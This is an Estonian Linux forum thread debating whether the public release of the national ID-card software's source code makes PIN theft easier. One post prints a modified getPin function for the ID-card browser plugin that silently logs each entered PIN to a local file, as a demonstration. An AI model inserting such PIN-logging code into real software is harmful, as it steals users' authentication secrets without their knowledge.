Autor |
Sõnum |
medieval
Pingviini aktivist


Vanus: 35
Liitunud: 16.11.2008
Postitused: 175
Asukoht: Saaremaa/Tartu
Distributsioon: Ubuntu 10.10

|
postitatud: 30.11.2010, 09:50 postituse pealkiri:
IDkaardi avalik lähtekood muudab PIN-koodi varguse hõlpsamas
|
   |
|
RIA on teinud avalikuks ID-kaardi lähtekoodid, mis muudab isikutunnistuse PIN-kaardi varguse hõlpsamaks ja odavamaks ning seeläbi ka ründe tõenäolisemaks.
Lähtekoodi kättesaadavaks muutumisega on lihtne endale sobivaid muudatusi tarkvarasse teha. Nii on ka pahatahtlikel
isikutel lihtsam luua võltstarkvara, mis näeb välja nagu see päris, aga teeb lisaks veel midagi - näiteks kasutab PIN koodi ilma omaniku teadmata.
Delfi
|
|
|
|
|
|
|
  |
kessu
Vana Pingviin


Vanus: 50
Liitunud: 16.07.2007
Postitused: 1106
Distributsioon: Ubuntu 16.04 LTS 64bit

|
postitatud: 30.11.2010, 10:00 postituse pealkiri:
(teema puudub)
|
   |
|
Esiteks on koguaeg ja igalpool üteldud, et tarkvara tuleks installida ainult usaldatavast allikast - nii ei saa ka võltstarkvara arvutisse.
Teiseks: kui mitmed siinsest foorumist on võimelised selliseid muudatusi tarkvarasse sisse viima?
|
|
|
|
_________________ Olen umbkeelne mulk ja ei saa võõrastest keeltest piisavalt aru
|
|
|
   |
illukas
Vana Pingviin

Vanus: 44
Liitunud: 24.10.2006
Postitused: 2036

|
|
|
   |
imapi
Vana Pingviin


Vanus: 45
Liitunud: 01.12.2005
Postitused: 567
Asukoht: Rakvere
Distributsioon: Mageia Cauldron

|
postitatud: 30.11.2010, 14:42 postituse pealkiri:
(teema puudub)
|
   |
|
Just mõtlesin siin, et huvitav kui palju neid lolle oleks, kes installiks endale id kaardi utiliidid mille ta on saanud kellegi tundmatu käest kuskilt internetist aga siis tuli mulle meelde mõni aeg tagasi tehtud "nali" Ganza Net -ga kui inimene on ikka väga loll siis on kõik võimalik
|
|
|
|
_________________ More than once my wife has asked why I don't do Windows, because that's where the money is. Why don't I just sell drugs or produce porn - there's money in those things, right?
|
|
|
    |
pisi
Pingviini kasutaja


Liitunud: 09.07.2007
Postitused: 65
Asukoht: Eesti
Distributsioon: Debian / Darwin

|
postitatud: 30.11.2010, 16:04 postituse pealkiri:
(teema puudub)
|
   |
|
imapi kirjutas: < Vali > < Laienda > | Just mõtlesin siin, et huvitav kui palju neid lolle oleks, kes installiks endale id kaardi utiliidid mille ta on saanud kellegi tundmatu käest kuskilt internetist aga siis tuli mulle meelde mõni aeg tagasi tehtud "nali" Ganza Net -ga :) kui inimene on ikka väga loll siis on kõik võimalik |
Neid peaks olema jalaga segada, teadupärast on kogu internett täis erinevaid õpetusi ja kohakesi, kuskohast tirida erinevat "ID-kaardi tarkvara", küll binaare, küll algkoodi, küll juhendeid ja skripte.
Teha lehekülg "Siit saad VEEL PAREMA ja VEEL AVATUMA algkoodiga tarkvara, tiri-tiri!" ja ma olen veendunud, et mõne nädalaga leiaks vähemalt mõnikümmend kui mitte mitusada inimest, kes tarkvara tiriks ja käima tõmbaks ja vajadusel "sudo blabla" kirjutaks kui internetis mingi foorum seda soovitaks.
Kes te avatud lähtekoodi pimesi kiidate, kui tihti reaalselt ise tarkvara netist tirite, selle autentsut ja terviklikust kontrollite, ise kompileerite (kompilaatoriga, mille puhul on kindel, et see sabasid ja sarvesid koodi ei pane), paigaldate jne?
Kuna enamus inimesi ei süvene, on näiteks osa seltskonda võimalik õnge võtta sildiga "Uus ja parem, 3x kiirem, optimeeritud registriga" teisi "uus ja parem, tasuta ja rohkem", kolmandaid "uus ja parem, lisaks avatud lähtekoodiga" (isegi kui see avatud lähtekood osutub alla tõmmates tegelikult piibli kolme esimese raamatu tekstiks), neljandaid lubadusega tasuta ligipääsu tüdruku msn-i parooli/suuri tisse/või lihtsalt midagi läikivat saada.
Delfi on delfi, muud ei midagi.
|
|
|
|
_________________ pisi - muidumees ja maailmaparandaja
@MartinPaljak.net
|
|
|
    |
tramm
Vana Pingviin


Liitunud: 03.11.2008
Postitused: 900
Distributsioon: *buntu

|
|
|
  |
oldgreeneye
Pingviini aktivist

Vanus: 34
Liitunud: 24.01.2008
Postitused: 297
Asukoht: Tartu
Distributsioon: Arch

|
postitatud: 30.11.2010, 16:45 postituse pealkiri:
(teema puudub)
|
   |
|
Kas see ründamise värk käib ainult avatud lähtekoodiga kaasas? Minuteada on ju võimalik ka binaaridelt infot varastada toppides neile midagi sappa. Kuskilt olen kuulnud ka binaari lähtekoodiks arutamisest. Minuarust on siin avatud ja suletud lähtekoodiga tarkvara täpselt võrdsed: avatud lähtekoodi puhul on võimalik sitikas otse koodi lülitada, suletud koodiga tarkvara kas lõhutakse lahti või lisatakse nähtamatu nuhkvara. Tarkvara kasutusjuhend võib ju öelda, et tarkvaral on konfliktid viirusetõrjega, kuid turvaohtu pole.
|
|
|
|
|
|
|
   |
lauris71
Uus kasutaja

Liitunud: 08.11.2010
Postitused: 4

|
postitatud: 30.11.2010, 18:09 postituse pealkiri:
(teema puudub)
|
   |
|
ID-kaardi PIN koodi varastamisest on pealegi vähe kasu. Esmalt pead sa kätte saam PIN-koodi ja seejärel kaardi enda - alles siis saad hakata teda kurjasti kasutama.
Aga avatud ja suletud lähtekoodil ei peaks siin küll mingit vahet olema. Kui vaja, võiks ju võtta ID tarkvara binaari, kirjutada talle ümber lihtne wrapper-library, mis salvestab suhtluse operatsioonisüsteemi kasutajaliidesega ja valmis. Pole mingit vajadust koodis tuhnida ja aru saada, kuidas konkreetne programm tegelikult töötab.
|
|
|
|
|
|
|
   |
illukas
Vana Pingviin

Vanus: 44
Liitunud: 24.10.2006
Postitused: 2036

|
postitatud: 30.11.2010, 18:39 postituse pealkiri:
(teema puudub)
|
   |
|
osavnäppudel käib sinu id-kaardi varastamine nii kiresti ja märkamatult, et sa ei saagi sellest ise aru...
Ja rahade ja asjade ülekanne võtab nii minimaalselt aega, et sa ei jõua mitte miskit ette võtta...
Kui ei eksi siis id-kaardi sulgemine käib mingi kirjaliku avalduse alusel ja ennist pidi politseisse helistama....
|
|
|
|
_________________ https://www.inlink.ee
|
|
|
   |
kessu
Vana Pingviin


Vanus: 50
Liitunud: 16.07.2007
Postitused: 1106
Distributsioon: Ubuntu 16.04 LTS 64bit

|
postitatud: 30.11.2010, 19:13 postituse pealkiri:
(teema puudub)
|
   |
|
No varastada saab jah ... saab ka vasta hambaid andes kätte (ja see on kõige lihtsam, sest inimesel peab ju isikitunnistus kaasas olema)* ja siis saab juba pinni ja punni kah. Selleni ma tahtsingi jõuda oma pstituse tulemusena, et tegelikult on see kartus vaba ja kinnise vara vahel üleliigne. Lammutada saab ju mõlemat. Kinnise koodi puhul tuleb ainult selle tegevuse kriminaalsus lisaks.
*Juhul kui ta ei kanna selle asemel kaasas juhiluba nagu mina.
|
|
|
|
_________________ Olen umbkeelne mulk ja ei saa võõrastest keeltest piisavalt aru
|
|
|
   |
andreas
Pingviini aktivist


Vanus: 31
Liitunud: 26.02.2008
Postitused: 112
Asukoht: Raasiku
Distributsioon: Mageia Cauldron

|
postitatud: 30.11.2010, 20:07 postituse pealkiri:
(teema puudub)
|
   |
|
Aga miks näitekoodi kõrval vaatamiseks pole? Delfi artikkel oli rohkem uue Zeusi troojalasest. Kelle koodi RIA üldse avaldas?
niisis:
PINi varastamine EstEID näitel
Failides esteid-browser-plugin/Win/pininputdialog.cpp ja esteid-browser-plugin/X11/pininputdialog.cpp on selline väike funktsioon:
Kood: < Vali > | std::string PinInputDialog::getPin(); |
Näiteks X11 versioon asendada sellega
Kood: < Vali > | std::string PinInputDialog::getPin()
{
std::string m_pin = m_entry->get_text();
std::ofstream pins("/tmp/pin.txt", std::ios::app);
pins << m_pin << std::endl;
return m_pin;
} |
Windowsile:
Kood: < Vali > | std::string PinInputDialog::getPin()
{
std::ofstream pins("C:\\pin.txt", std::ios::app);
pins << m_pin << std::endl;
return m_pin;
}
|
Faili päises peab sellel juhul olema Kood: < Vali > | #include <fstream> |
Nime ja isikukoodi peaks kätte saama smartcardpp moodulist.
Mul on kahtlus, et mu klassikaaslased (programmeerimist õppinud alates 6. septembrist) saaksid ka sellega hakkama.
|
|
|
|
|
|
|
   |
urmas
Pingviini kasutaja

Vanus: 47
Liitunud: 25.07.2006
Postitused: 92
Asukoht: Tartu
Distributsioon: Gentoo

|
postitatud: 01.12.2010, 14:25 postituse pealkiri:
(teema puudub)
|
   |
|
klassikaaslased saavad hakkama aga mis edasi? selleks et see kusagile arvutisse istutada tuleb ka vaeva näha. Ja istutamise puhul oleks juba tavaline keylogger kordi lihtsam, infoküllam ning kasulikum.
aga tore et mõtlema on hakatud id-kaardi üldise turva peale. kahju ainult et avatud lähtekoodi süüdstatakse..
|
|
|
|
|
|
|
   |
kernull
Pingviini kasutaja

Liitunud: 03.08.2008
Postitused: 58
Asukoht: Tallinn

|
|
|
  |
pingviin
Pingviini kasutaja


Vanus: 43
Liitunud: 26.07.2005
Postitused: 52
Distributsioon: Open Suse 11.3

|
postitatud: 05.12.2010, 17:01 postituse pealkiri:
avatud kood ja turvalisus
|
   |
|
Üldiselt on tarkvata arendamise kogemuses selgeks saanud, et koodi avamine muudab tervikuna tarkvara turvalisemaks, kuna turvalisuse parendamisse kaasatakse avalikus (erinevad interneti kogukonnad, turva eksperdid, jne ...). Inimesed saavad vabalt kirjutada neile, et see või too rida sisaldab sellist turvaviga, millele peaks järgnema turva fix.
See võrdlus, et tõmmatakse tundmatust kohast, kus asub juba pahaks muudetud tarkvara ei lävi eriti, sest sama hästi võib keegi kinnisele koodile lisa juurde kirjutada, mis muudab selle pahaks ning panna kuhu iganes saadavale. Nagu me kõik teame, enamus tarkvara on võimalik krakkida ning enamasti on need just suletud koodiga.
Lisaks annab koodi avamine võimaluse tuua välja isiku privaatsusega seotud probleemid, kui tarkvara ei sisalda turva auke, aga käib hooletult ümber kodaniku isikuandmetega, siis avatud kood võimaldab avalikusel ka sellele lihtsamini reageerida.
Siit ka ideid hullumeelsetele, keegi võiks proovida kirjutada explodi ning siis saata see ID kaarid arendajatel anda neile võimalus asi parandada ning siis avaldada see (exploit) kõigile, siis saaks aru ka kui tõsiselt tegelikult asja võetakse. Reeglina annavad heatahtlikud avastjad mingi 6 kuud aega, enne kui asja avaldaavad.
|
|
|
|
|
|
|
  |
pisi
Pingviini kasutaja


Liitunud: 09.07.2007
Postitused: 65
Asukoht: Eesti
Distributsioon: Debian / Darwin

|
postitatud: 05.12.2010, 21:10 postituse pealkiri:
(teema puudub)
|
   |
|
Küsimus ei ole avatud lähtekoodi vs suletud lähtekoodi turvalisuses. Tahes matkida suletud lähtekoodiga tarkvara (Windowsi) on vaja VägaPaljuRaha selle uuesti arendamiseks või VägaHeadVarast (kes algkoodi hangiks). Avatud lähtekoodiga Linuxi puhul piisab aga paarist sõtmeliigutusest ja juba saabki Red Hatist CentOS.
Suletud tarkvara kallale minemine eeldab palju paremat (ja seega ka kallimat) oskusteavet kui "./configure; make; make re-dist;" käskude tundmist.
Seega objektiine hinnang, et avatud lähtekoodiga programmi X puhul on pahalasel väga palju odavam luua selle halvasti käituv koopia X' võrreldes suletud lähtekoodiga tarkvaraga, on lihtne fakt.
Ei maksa näha tonti seal kus teda tegelikult pole.
|
|
|
|
_________________ pisi - muidumees ja maailmaparandaja
@MartinPaljak.net
|
|
|
    |
akbgf
Vana Pingviin


Liitunud: 07.10.2009
Postitused: 763
Asukoht: Tõravere
Distributsioon: OpenSUSE, Ubuntu

|
|
|
   |
andreas
Pingviini aktivist


Vanus: 31
Liitunud: 26.02.2008
Postitused: 112
Asukoht: Raasiku
Distributsioon: Mageia Cauldron

|
|
|
   |
illukas
Vana Pingviin

Vanus: 44
Liitunud: 24.10.2006
Postitused: 2036

|
postitatud: 06.12.2010, 12:48 postituse pealkiri:
(teema puudub)
|
   |
|
vahet ei ole kas ta jääb samaks või mitte, vaadates inimeste arvutikasutamis harjumusi siis md5 ei oma absoluutselt mingit tähtsust, sest tõmmatakse softi sealt kust juhtub, küsimise peale saad vastuseks, et ei tea kuskilt sain või keegi pani...
Sarnane olukord tuleb meelde panga koodidega kus inimesed panid mingil suvalisel lehel oma paroole
|
|
|
|
_________________ https://www.inlink.ee
|
|
|
   |
gigake
Pingviini külastaja

Liitunud: 06.11.2006
Postitused: 24

|
postitatud: 06.12.2010, 22:58 postituse pealkiri:
(teema puudub)
|
   |
|
md5sum'iga on tõesti nii, et kes teab, mis see on, oskab tarkvara tõmmata otse algallikast. Teised aga ei hakka sellele md5-ele mingit tähelepanu pöörama. Seega on see suhteliselt kasutu.
|
|
|
|
|
|
|
  |
akbgf
Vana Pingviin


Liitunud: 07.10.2009
Postitused: 763
Asukoht: Tõravere
Distributsioon: OpenSUSE, Ubuntu

|
|
|
   |
|